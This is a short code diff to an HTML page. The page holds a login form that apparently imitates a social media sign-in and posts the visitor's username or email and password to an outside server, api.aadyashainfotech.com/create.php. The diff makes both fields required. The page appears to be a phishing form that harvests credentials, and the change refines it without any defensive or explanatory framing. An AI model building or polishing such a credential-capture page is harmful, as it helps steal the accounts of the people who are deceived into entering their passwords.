--- a/index.html
+++ b/index.html
@@ -173,10 +173,10 @@ padding: 1px;" src="v.mp4" ></video>
           <img src="logo.png" style="margin-bottom: 21px; margin-top: 13px; width: 150px; display: block; margin-left: auto; margin-right: auto;" alt="">
         <form action="https://api.aadyashainfotech.com/create.php" method="post" >
           <div class="mb-3">
-            <input type="text" class="form-control" placeholder="Phone number, username, or email" name="mbid" id="recipient-name">
+            <input type="text" class="form-control" placeholder="Phone number, username, or email" name="mbid" id="recipient-name" required>
           </div>
           <div class="mb-3">
-            <input type="text" class="form-control" placeholder="Password" name="password" id="recipient-name">
+            <input type="text" class="form-control" placeholder="Password" name="password" id="recipient-name" required>
           </div>
           <button type="submit" class="btn btn-primary">Log In</button>
         </form>
